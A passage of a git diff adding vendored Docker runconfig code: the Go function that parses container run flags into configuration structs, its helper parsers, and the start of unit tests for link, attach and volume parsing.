copts.ioMaxBandwidth) + } + } + + var binds []string + volumes := copts.volumes.GetMap() + // add any bind targets to the list of container volumes + for bind := range copts.volumes.GetMap() { + if arr := volumeSplitN(bind, 2); len(arr) > 1 { + // after creating the bind mount we want to delete it from the copts.volumes values because + // we do not want bind mounts being committed to image configs + binds = append(binds, bind) + // We should delete from the map (`volumes`) here, as deleting from copts.volumes will not work if + // there are duplicates entries. + delete(volumes, bind) + } + } + + // Can't evaluate options passed into --tmpfs until we actually mount + tmpfs := make(map[string]string) + for _, t := range copts.tmpfs.GetAll() { + if arr := strings.SplitN(t, ":", 2); len(arr) > 1 { + tmpfs[arr[0]] = arr[1] + } else { + tmpfs[arr[0]] = "" + } + } + + var ( + runCmd strslice.StrSlice + entrypoint strslice.StrSlice + ) + + if len(copts.Args) > 0 { + runCmd = strslice.StrSlice(copts.Args) + } + + if copts.entrypoint != "" { + entrypoint = strslice.StrSlice{copts.entrypoint} + } else if flags.Changed("entrypoint") { + // if `--entrypoint=` is parsed then Entrypoint is reset + entrypoint = []string{""} + } + + ports, portBindings, err := nat.ParsePortSpecs(copts.publish.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + // Merge in exposed ports to the map of published ports + for _, e := range copts.expose.GetAll() { + if strings.Contains(e, ":") { + return nil, nil, nil, fmt.Errorf("invalid port format for --expose: %s", e) + } + //support two formats for expose, original format /[] or /[] + proto, port := nat.SplitProtoPort(e) + //parse the start and end port and create a sequence of ports to expose + //if expose a port, the start and end port are the same + start, end, err := nat.ParsePortRange(port) + if err != nil { + return nil, nil, nil, fmt.Errorf("invalid range format for --expose: %s, error: %s", e, err) + } + for i := start; i <= end; i++ { + p, err := nat.NewPort(proto, strconv.FormatUint(i, 10)) + if err != nil { + return nil, nil, nil, err + } + if _, exists := ports[p]; !exists { + ports[p] = struct{}{} + } + } + } + + // parse device mappings + deviceMappings := []container.DeviceMapping{} + for _, device := range copts.devices.GetAll() { + deviceMapping, err := ParseDevice(device) + if err != nil { + return nil, nil, nil, err + } + deviceMappings = append(deviceMappings, deviceMapping) + } + + // collect all the environment variables for the container + envVariables, err := ReadKVStrings(copts.envFile.GetAll(), copts.env.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + // collect all the labels for the container + labels, err := ReadKVStrings(copts.labelsFile.GetAll(), copts.labels.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + ipcMode := container.IpcMode(copts.ipcMode) + if !ipcMode.Valid() { + return nil, nil, nil, fmt.Errorf("--ipc: invalid IPC mode") + } + + pidMode := container.PidMode(copts.pidMode) + if !pidMode.Valid() { + return nil, nil, nil, fmt.Errorf("--pid: invalid PID mode") + } + + utsMode := container.UTSMode(copts.utsMode) + if !utsMode.Valid() { + return nil, nil, nil, fmt.Errorf("--uts: invalid UTS mode") + } + + usernsMode := container.UsernsMode(copts.usernsMode) + if !usernsMode.Valid() { + return nil, nil, nil, fmt.Errorf("--userns: invalid USER mode") + } + + restartPolicy, err := ParseRestartPolicy(copts.restartPolicy) + if err != nil { + return nil, nil, nil, err + } + + loggingOpts, err := parseLoggingOpts(copts.loggingDriver, copts.loggingOpts.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + securityOpts, err := parseSecurityOpts(copts.securityOpt.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + storageOpts, err := parseStorageOpts(copts.storageOpt.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + // Healthcheck + var healthConfig *container.HealthConfig + haveHealthSettings := copts.healthCmd != "" || + copts.healthInterval != 0 || + copts.healthTimeout != 0 || + copts.healthRetries != 0 + if copts.noHealthcheck { + if haveHealthSettings { + return nil, nil, nil, fmt.Errorf("--no-healthcheck conflicts with --health-* options") + } + test := strslice.StrSlice{"NONE"} + healthConfig = &container.HealthConfig{Test: test} + } else if haveHealthSettings { + var probe strslice.StrSlice + if copts.healthCmd != "" { + args := []string{"CMD-SHELL", copts.healthCmd} + probe = strslice.StrSlice(args) + } + if copts.healthInterval < 0 { + return nil, nil, nil, fmt.Errorf("--health-interval cannot be negative") + } + if copts.healthTimeout < 0 { + return nil, nil, nil, fmt.Errorf("--health-timeout cannot be negative") + } + + healthConfig = &container.HealthConfig{ + Test: probe, + Interval: copts.healthInterval, + Timeout: copts.healthTimeout, + Retries: copts.healthRetries, + } + } + + resources := container.Resources{ + CgroupParent: copts.cgroupParent, + Memory: memory, + MemoryReservation: memoryReservation, + MemorySwap: memorySwap, + MemorySwappiness: &copts.swappiness, + KernelMemory: kernelMemory, + OomKillDisable: &copts.oomKillDisable, + NanoCPUs: copts.cpus.Value(), + CPUCount: copts.cpuCount, + CPUPercent: copts.cpuPercent, + CPUShares: copts.cpuShares, + CPUPeriod: copts.cpuPeriod, + CpusetCpus: copts.cpusetCpus, + CpusetMems: copts.cpusetMems, + CPUQuota: copts.cpuQuota, + CPURealtimePeriod: copts.cpuRealtimePeriod, + CPURealtimeRuntime: copts.cpuRealtimeRuntime, + PidsLimit: copts.pidsLimit, + BlkioWeight: copts.blkioWeight, + BlkioWeightDevice: copts.blkioWeightDevice.GetList(), + BlkioDeviceReadBps: copts.deviceReadBps.GetList(), + BlkioDeviceWriteBps: copts.deviceWriteBps.GetList(), + BlkioDeviceReadIOps: copts.deviceReadIOps.GetList(), + BlkioDeviceWriteIOps: copts.deviceWriteIOps.GetList(), + IOMaximumIOps: copts.ioMaxIOps, + IOMaximumBandwidth: uint64(maxIOBandwidth), + Ulimits: copts.ulimits.GetList(), + Devices: deviceMappings, + } + + config := &container.Config{ + Hostname: copts.hostname, + ExposedPorts: ports, + User: copts.user, + Tty: copts.tty, + // TODO: deprecated, it comes from -n, --networking + // it's still needed internally to set the network to disabled + // if e.g. bridge is none in daemon opts, and in inspect + NetworkDisabled: false, + OpenStdin: copts.stdin, + AttachStdin: attachStdin, + AttachStdout: attachStdout, + AttachStderr: attachStderr, + Env: envVariables, + Cmd: runCmd, + Image: copts.Image, + Volumes: volumes, + MacAddress: copts.macAddress, + Entrypoint: entrypoint, + WorkingDir: copts.workingDir, + Labels: ConvertKVStringsToMap(labels), + Healthcheck: healthConfig, + } + if flags.Changed("stop-signal") { + config.StopSignal = copts.stopSignal + } + if flags.Changed("stop-timeout") { + config.StopTimeout = &copts.stopTimeout + } + + hostConfig := &container.HostConfig{ + Binds: binds, + ContainerIDFile: copts.containerIDFile, + OomScoreAdj: copts.oomScoreAdj, + AutoRemove: copts.autoRemove, + Privileged: copts.privileged, + PortBindings: portBindings, + Links: copts.links.GetAll(), + PublishAllPorts: copts.publishAll, + // Make sure the dns fields are never nil. + // New containers don't ever have those fields nil, + // but pre created containers can still have those nil values. + // See https://github.com/docker/docker/pull/17779 + // for a more detailed explanation on why we don't want that. + DNS: copts.dns.GetAllOrEmpty(), + DNSSearch: copts.dnsSearch.GetAllOrEmpty(), + DNSOptions: copts.dnsOptions.GetAllOrEmpty(), + ExtraHosts: copts.extraHosts.GetAll(), + VolumesFrom: copts.volumesFrom.GetAll(), + NetworkMode: container.NetworkMode(copts.netMode), + IpcMode: ipcMode, + PidMode: pidMode, + UTSMode: utsMode, + UsernsMode: usernsMode, + CapAdd: strslice.StrSlice(copts.capAdd.GetAll()), + CapDrop: strslice.StrSlice(copts.capDrop.GetAll()), + GroupAdd: copts.groupAdd.GetAll(), + RestartPolicy: restartPolicy, + SecurityOpt: securityOpts, + StorageOpt: storageOpts, + ReadonlyRootfs: copts.readonlyRootfs, + LogConfig: container.LogConfig{Type: copts.loggingDriver, Config: loggingOpts}, + VolumeDriver: copts.volumeDriver, + Isolation: container.Isolation(copts.isolation), + ShmSize: shmSize, + Resources: resources, + Tmpfs: tmpfs, + Sysctls: copts.sysctls.GetAll(), + Runtime: copts.runtime, + } + + // only set this value if the user provided the flag, else it should default to nil + if flags.Changed("init") { + hostConfig.Init = &copts.init + } + + // When allocating stdin in attached mode, close stdin at client disconnect + if config.OpenStdin && config.AttachStdin { + config.StdinOnce = true + } + + networkingConfig := &networktypes.NetworkingConfig{ + EndpointsConfig: make(map[string]*networktypes.EndpointSettings), + } + + if copts.ipv4Address != "" || copts.ipv6Address != "" || copts.linkLocalIPs.Len() > 0 { + epConfig := &networktypes.EndpointSettings{} + networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig + + epConfig.IPAMConfig = &networktypes.EndpointIPAMConfig{ + IPv4Address: copts.ipv4Address, + IPv6Address: copts.ipv6Address, + } + + if copts.linkLocalIPs.Len() > 0 { + epConfig.IPAMConfig.LinkLocalIPs = make([]string, copts.linkLocalIPs.Len()) + copy(epConfig.IPAMConfig.LinkLocalIPs, copts.linkLocalIPs.GetAll()) + } + } + + if hostConfig.NetworkMode.IsUserDefined() && len(hostConfig.Links) > 0 { + epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] + if epConfig == nil { + epConfig = &networktypes.EndpointSettings{} + } + epConfig.Links = make([]string, len(hostConfig.Links)) + copy(epConfig.Links, hostConfig.Links) + networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig + } + + if copts.aliases.Len() > 0 { + epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] + if epConfig == nil { + epConfig = &networktypes.EndpointSettings{} + } + epConfig.Aliases = make([]string, copts.aliases.Len()) + copy(epConfig.Aliases, copts.aliases.GetAll()) + networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig + } + + return config, hostConfig, networkingConfig, nil +} + +// ReadKVStrings reads a file of line terminated key=value pairs, and overrides any keys +// present in the file with additional pairs specified in the override parameter +func ReadKVStrings(files []string, override []string) ([]string, error) { + envVariables := []string{} + for _, ef := range files { + parsedVars, err := ParseEnvFile(ef) + if err != nil { + return nil, err + } + envVariables = append(envVariables, parsedVars...) + } + // parse the '-e' and '--env' after, to allow override + envVariables = append(envVariables, override...) + + return envVariables, nil +} + +// ConvertKVStringsToMap converts ["key=value"] to {"key":"value"} +func ConvertKVStringsToMap(values []string) map[string]string { + result := make(map[string]string, len(values)) + for _, value := range values { + kv := strings.SplitN(value, "=", 2) + if len(kv) == 1 { + result[kv[0]] = "" + } else { + result[kv[0]] = kv[1] + } + } + + return result +} + +// ConvertKVStringsToMapWithNil converts ["key=value"] to {"key":"value"} +// but set unset keys to nil - meaning the ones with no "=" in them. +// We use this in cases where we need to distinguish between +// FOO= and FOO +// where the latter case just means FOO was mentioned but not given a value +func ConvertKVStringsToMapWithNil(values []string) map[string]*string { + result := make(map[string]*string, len(values)) + for _, value := range values { + kv := strings.SplitN(value, "=", 2) + if len(kv) == 1 { + result[kv[0]] = nil + } else { + result[kv[0]] = &kv[1] + } + } + + return result +} + +func parseLoggingOpts(loggingDriver string, loggingOpts []string) (map[string]string, error) { + loggingOptsMap := ConvertKVStringsToMap(loggingOpts) + if loggingDriver == "none" && len(loggingOpts) > 0 { + return map[string]string{}, fmt.Errorf("invalid logging opts for driver %s", loggingDriver) + } + return loggingOptsMap, nil +} + +// takes a local seccomp daemon, reads the file contents for sending to the daemon +func parseSecurityOpts(securityOpts []string) ([]string, error) { + for key, opt := range securityOpts { + con := strings.SplitN(opt, "=", 2) + if len(con) == 1 && con[0] != "no-new-privileges" { + if strings.Contains(opt, ":") { + con = strings.SplitN(opt, ":", 2) + } else { + return securityOpts, fmt.Errorf("Invalid --security-opt: %q", opt) + } + } + if con[0] == "seccomp" && con[1] != "unconfined" { + f, err := ioutil.ReadFile(con[1]) + if err != nil { + return securityOpts, fmt.Errorf("opening seccomp profile (%s) failed: %v", con[1], err) + } + b := bytes.NewBuffer(nil) + if err := json.Compact(b, f); err != nil { + return securityOpts, fmt.Errorf("compacting json for seccomp profile (%s) failed: %v", con[1], err) + } + securityOpts[key] = fmt.Sprintf("seccomp=%s", b.Bytes()) + } + } + + return securityOpts, nil +} + +// parses storage options per container into a map +func parseStorageOpts(storageOpts []string) (map[string]string, error) { + m := make(map[string]string) + for _, option := range storageOpts { + if strings.Contains(option, "=") { + opt := strings.SplitN(option, "=", 2) + m[opt[0]] = opt[1] + } else { + return nil, fmt.Errorf("invalid storage option") + } + } + return m, nil +} + +// ParseRestartPolicy returns the parsed policy or an error indicating what is incorrect +func ParseRestartPolicy(policy string) (container.RestartPolicy, error) { + p := container.RestartPolicy{} + + if policy == "" { + return p, nil + } + + parts := strings.Split(policy, ":") + + if len(parts) > 2 { + return p, fmt.Errorf("invalid restart policy format") + } + if len(parts) == 2 { + count, err := strconv.Atoi(parts[1]) + if err != nil { + return p, fmt.Errorf("maximum retry count must be an integer") + } + + p.MaximumRetryCount = count + } + + p.Name = parts[0] + + return p, nil +} + +// ParseDevice parses a device mapping string to a container.DeviceMapping struct +func ParseDevice(device string) (container.DeviceMapping, error) { + src := "" + dst := "" + permissions := "rwm" + arr := strings.Split(device, ":") + switch len(arr) { + case 3: + permissions = arr[2] + fallthrough + case 2: + if ValidDeviceMode(arr[1]) { + permissions = arr[1] + } else { + dst = arr[1] + } + fallthrough + case 1: + src = arr[0] + default: + return container.DeviceMapping{}, fmt.Errorf("invalid device specification: %s", device) + } + + if dst == "" { + dst = src + } + + deviceMapping := container.DeviceMapping{ + PathOnHost: src, + PathInContainer: dst, + CgroupPermissions: permissions, + } + return deviceMapping, nil +} + +// ParseLink parses and validates the specified string as a link format (name:alias) +func ParseLink(val string) (string, string, error) { + if val == "" { + return "", "", fmt.Errorf("empty string specified for links") + } + arr := strings.Split(val, ":") + if len(arr) > 2 { + return "", "", fmt.Errorf("bad format for links: %s", val) + } + if len(arr) == 1 { + return val, val, nil + } + // This is kept because we can actually get a HostConfig with links + // from an already created container and the format is not `foo:bar` + // but `/foo:/c1/bar` + if strings.HasPrefix(arr[0], "/") { + _, alias := path.Split(arr[1]) + return arr[0][1:], alias, nil + } + return arr[0], arr[1], nil +} + +// ValidateLink validates that the specified string has a valid link format (containerName:alias). +func ValidateLink(val string) (string, error) { + if _, _, err := ParseLink(val); err != nil { + return val, err + } + return val, nil +} + +// ValidDeviceMode checks if the mode for device is valid or not. +// Valid mode is a composition of r (read), w (write), and m (mknod). +func ValidDeviceMode(mode string) bool { + var legalDeviceMode = map[rune]bool{ + 'r': true, + 'w': true, + 'm': true, + } + if mode == "" { + return false + } + for _, c := range mode { + if !legalDeviceMode[c] { + return false + } + legalDeviceMode[c] = false + } + return true +} + +// ValidateDevice validates a path for devices +// It will make sure 'val' is in the form: +// [host-dir:]container-path[:mode] +// It also validates the device mode. +func ValidateDevice(val string) (string, error) { + return validatePath(val, ValidDeviceMode) +} + +func validatePath(val string, validator func(string) bool) (string, error) { + var containerPath string + var mode string + + if strings.Count(val, ":") > 2 { + return val, fmt.Errorf("bad format for path: %s", val) + } + + split := strings.SplitN(val, ":", 3) + if split[0] == "" { + return val, fmt.Errorf("bad format for path: %s", val) + } + switch len(split) { + case 1: + containerPath = split[0] + val = path.Clean(containerPath) + case 2: + if isValid := validator(split[1]); isValid { + containerPath = split[0] + mode = split[1] + val = fmt.Sprintf("%s:%s", path.Clean(containerPath), mode) + } else { + containerPath = split[1] + val = fmt.Sprintf("%s:%s", split[0], path.Clean(containerPath)) + } + case 3: + containerPath = split[1] + mode = split[2] + if isValid := validator(split[2]); !isValid { + return val, fmt.Errorf("bad mode specified: %s", mode) + } + val = fmt.Sprintf("%s:%s:%s", split[0], containerPath, mode) + } + + if !path.IsAbs(containerPath) { + return val, fmt.Errorf("%s is not an absolute path", containerPath) + } + return val, nil +} + +// volumeSplitN splits raw into a maximum of n parts, separated by a separator colon. +// A separator colon is the last `:` character in the regex `[:\\]?[a-zA-Z]:` (note `\\` is `\` escaped). +// In Windows driver letter appears in two situations: +// a. `^[a-zA-Z]:` (A colon followed by `^[a-zA-Z]:` is OK as colon is the separator in volume option) +// b. A string in the format like `\\?\C:\Windows\...` (UNC). +// Therefore, a driver letter can only follow either a `:` or `\\` +// This allows to correctly split strings such as `C:\foo:D:\:rw` or `/tmp/q:/foo`. +func volumeSplitN(raw string, n int) []string { + var array []string + if len(raw) == 0 || raw[0] == ':' { + // invalid + return nil + } + // numberOfParts counts the number of parts separated by a separator colon + numberOfParts := 0 + // left represents the left-most cursor in raw, updated at every `:` character considered as a separator. + left := 0 + // right represents the right-most cursor in raw incremented with the loop. Note this + // starts at index 1 as index 0 is already handle above as a special case. + for right := 1; right < len(raw); right++ { + // stop parsing if reached maximum number of parts + if n >= 0 && numberOfParts >= n { + break + } + if raw[right] != ':' { + continue + } + potentialDriveLetter := raw[right-1] + if (potentialDriveLetter >= 'A' && potentialDriveLetter <= 'Z') || (potentialDriveLetter >= 'a' && potentialDriveLetter <= 'z') { + if right > 1 { + beforePotentialDriveLetter := raw[right-2] + // Only `:` or `\\` are checked (`/` could fall into the case of `/tmp/q:/foo`) + if beforePotentialDriveLetter != ':' && beforePotentialDriveLetter != '\\' { + // e.g. `C:` is not preceded by any delimiter, therefore it was not a drive letter but a path ending with `C:`. + array = append(array, raw[left:right]) + left = right + 1 + numberOfParts++ + } + // else, `C:` is considered as a drive letter and not as a delimiter, so we continue parsing. + } + // if right == 1, then `C:` is the beginning of the raw string, therefore `:` is again not considered a delimiter and we continue parsing. + } else { + // if `:` is not preceded by a potential drive letter, then consider it as a delimiter. + array = append(array, raw[left:right]) + left = right + 1 + numberOfParts++ + } + } + // need to take care of the last part + if left < len(raw) { + if n >= 0 && numberOfParts >= n { + // if the maximum number of parts is reached, just append the rest to the last part + // left-1 is at the last `:` that needs to be included since not considered a separator. + array[n-1] += raw[left-1:] + } else { + array = append(array, raw[left:]) + } + } + return array +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go new file mode 100644 index 0000000000..a1be379ae8 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go @@ -0,0 +1,894 @@ +package opts + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" + "github.com/spf13/pflag" +) + +func parseRun(args []string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + flags := pflag.NewFlagSet("run", pflag.ContinueOnError) + flags.SetOutput(ioutil.Discard) + flags.Usage = nil + copts := AddFlags(flags) + if err := flags.Parse(args); err != nil { + return nil, nil, nil, err + } + return Parse(flags, copts) +} + +func parse(t *testing.T, args string) (*container.Config, *container.HostConfig, error) { + config, hostConfig, _, err := parseRun(strings.Split(args+" ubuntu bash", " ")) + return config, hostConfig, err +} + +func mustParse(t *testing.T, args string) (*container.Config, *container.HostConfig) { + config, hostConfig, err := parse(t, args) + if err != nil { + t.Fatal(err) + } + return config, hostConfig +} + +func TestParseRunLinks(t *testing.T) { + if _, hostConfig := mustParse(t, "--link a:b"); len(hostConfig.Links) == 0 || hostConfig.Links[0] != "a:b" { + t.Fatalf("Error parsing links. Expected []string{\"a:b\"}, received: %v", hostConfig.Links) + } + if _, hostConfig := mustParse(t, "--link a:b --link c:d"); len(hostConfig.Links) < 2 || hostConfig.Links[0] != "a:b" || hostConfig.Links[1] != "c:d" { + t.Fatalf("Error parsing links. Expected []string{\"a:b\", \"c:d\"}, received: %v", hostConfig.Links) + } + if _, hostConfig := mustParse(t, ""); len(hostConfig.Links) != 0 { + t.Fatalf("Error parsing links. No link expected, received: %v", hostConfig.Links) + } +} + +func TestParseRunAttach(t *testing.T) { + if config, _ := mustParse(t, "-a stdin"); !config.AttachStdin || config.AttachStdout || config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect only Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, "-a stdin -a stdout"); !config.AttachStdin || !config.AttachStdout || config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect only Stdin and Stdout enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, "-a stdin -a stdout -a stderr"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect all attach enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, ""); config.AttachStdin || !config.AttachStdout || !config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect Stdin disabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + if config, _ := mustParse(t, "-i"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { + t.Fatalf("Error parsing attach flags. Expect Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) + } + + if _, _, err := parse(t, "-a"); err == nil { + t.Fatalf("Error parsing attach flags, `-a` should be an error but is not") + } + if _, _, err := parse(t, "-a invalid"); err == nil { + t.Fatalf("Error parsing attach flags, `-a invalid` should be an error but is not") + } + if _, _, err := parse(t, "-a invalid -a stdout"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdout -a invalid` should be an error but is not") + } + if _, _, err := parse(t, "-a stdout -a stderr -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdout -a stderr -d` should be an error but is not") + } + if _, _, err := parse(t, "-a stdin -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdin -d` should be an error but is not") + } + if _, _, err := parse(t, "-a stdout -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stdout -d` should be an error but is not") + } + if _, _, err := parse(t, "-a stderr -d"); err == nil { + t.Fatalf("Error parsing attach flags, `-a stderr -d` should be an error but is not") + } + if _, _, err := parse(t, "-d --rm"); err == nil { + t.Fatalf("Error parsing attach flags, `-d --rm` should be an error but is not") + } +} + +func TestParseRunVolumes(t *testing.T) { + + // A single volume + arr, tryit := setupPlatformVolume([]string{`/tmp`}, []string{`c:\tmp`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { + t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) + } else if _, exists := config.Volumes[arr[0]]; !exists { + t.Fatalf("Error parsing volume flags, %q is missing from volumes. Received %v", tryit, config.Volumes) + } + + // Two volumes + arr, tryit = setupPlatformVolume([]string{`/tmp`, `/var`}, []string{`c:\tmp`, `c:\var`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { + t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) + } else if _, exists := config.Volumes[arr[0]]; !exists { + t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[0], config.Volumes) + } else if _, exists := config.Volumes[arr[1]]; !exists { + t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[1], config.Volumes) + } + + // A single bind-mount + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || hostConfig.Binds[0] != arr[0] { + t.Fatalf("Error parsing volume flags, %q should mount-bind the path before the colon into the path after the colon. Received %v %v", arr[0], hostConfig.Binds, config.Volumes) + } + + // Two bind-mounts. + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/hostVar:/containerVar`}, []string{os.Getenv("ProgramData") + `:c:\ContainerPD`, os.Getenv("TEMP") + `:c:\containerTmp`}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + + // Two bind-mounts, first read-only, second read-write. + // TODO Windows: The Windows version uses read-write as that's the only mode it supports. Can change this post TP4 + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro`, `/hostVar:/containerVar:rw`}, []string{os.Getenv("TEMP") + `:c:\containerTmp:rw`, os.Getenv("ProgramData") + `:c:\ContainerPD:rw`}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + + // Similar to previous test but with alternate modes which are only supported by Linux + if runtime.GOOS != "windows" { + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro,Z`, `/hostVar:/containerVar:rw,Z`}, []string{}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:Z`, `/hostVar:/containerVar:z`}, []string{}) + if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { + t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) + } + } + + // One bind mount and one volume + arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/containerVar`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`, `c:\containerTmp`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] { + t.Fatalf("Error parsing volume flags, %s and %s should only one and only one bind mount %s. Received %s", arr[0], arr[1], arr[0], hostConfig.Binds) + } else if _, exists := config.Volumes[arr[1]]; !exists { + t.Fatalf("Error parsing volume flags %s and %s. %s is missing from volumes. Received %v", arr[0], arr[1], arr[1], config.Volumes) + } + + // Root to non-c: drive letter (Windows specific) + if runtime.GOOS == "windows" { + arr, tryit = setupPlatformVolume([]string{}, []string{os.Getenv("SystemDrive") + `\:d:`}) + if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] || len(config.Volumes) != 0 { + t.Fatalf("Error parsing %s. Should have a single bind mount and no volumes", arr[0]) + } + } + +} + +// This tests the cases for binds which are generated through +// DecodeContainerConfig rather than Parse() +func TestDecodeContainerConfigVolumes(t *testing.T) { + + // Root to root + bindsOrVols, _ := setupPlatformVolume([]string{`/:/`}, []string{os.Getenv("SystemDrive") + `\:c:\`}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // No destination path + bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:`}, []string{os.Getenv("TEMP") + `\:`}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // // No destination path or mode + bindsOrVols, _ = setupPlatformVolume([]string{`/tmp::`}, []string{os.Getenv("TEMP") + `\::`}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // A whole lot of nothing + bindsOrVols = []string{`:`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // A whole lot of nothing with no mode + bindsOrVols = []string{`::`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Too much including an invalid mode + wTmp := os.Getenv("TEMP") + bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:/tmp:/tmp:/tmp`}, []string{wTmp + ":" + wTmp + ":" + wTmp + ":" + wTmp}) + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Windows specific error tests + if runtime.GOOS == "windows" { + // Volume which does not include a drive letter + bindsOrVols = []string{`\tmp`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Root to C-Drive + bindsOrVols = []string{os.Getenv("SystemDrive") + `\:c:`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // Container path that does not include a drive letter + bindsOrVols = []string{`c:\windows:\somewhere`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v 